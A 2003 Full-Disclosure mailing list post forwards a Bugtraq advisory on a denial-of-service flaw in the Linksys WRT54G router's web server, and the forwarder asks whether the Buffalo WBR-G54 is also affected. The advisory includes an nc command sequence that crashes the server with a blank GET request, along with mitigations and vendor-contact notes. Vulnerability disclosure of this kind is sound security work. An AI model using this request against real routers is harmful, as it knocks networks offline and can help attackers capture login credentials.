[Full-Disclosure] [Fwd: Bugtraq: Linksys WRT54G Denial of Service Vulnerability]

[Michael Renzmann]

Can anyone confirm if technically identical devices such as the Buffalo 
WBR-G54 share this vulnerability?

-------- Original Message --------
Subject: Linksys WRT54G Denial of Service Vulnerability
Date: 3 Dec 2003 22:35:26 -0000
From: <test at techcentric.net>
To: bugtraq at securityfocus.com



Linksys WRT54G Denial of Service Vulnerability







System(s)

===========



Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)





Detail(s)

===========



Sending a blank GET request to the router on port 80 (or 8080) halts the 
embedded webserver.  This may allow an attacker to force the owner to 
reboot the router, allowing them to gain sensitive information during 
router authentication.



Exploitation

============



user at test:~$ nc 10.0.0.1 80

GET

user at test:~$ nc 10.0.0.1 80

(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused

user at test:~$



Solution(s)

============



- Https service should continue running for remote      access.

- Scan for sniffers that might be on the network before rebooting and 
performing any authentication.

- Wait for a vendor patch :)



Status

============



Vendor contacted on 12/03/03.





!HAPPY HOLIDAYS!

carbon at techcentric.net - 12/02/03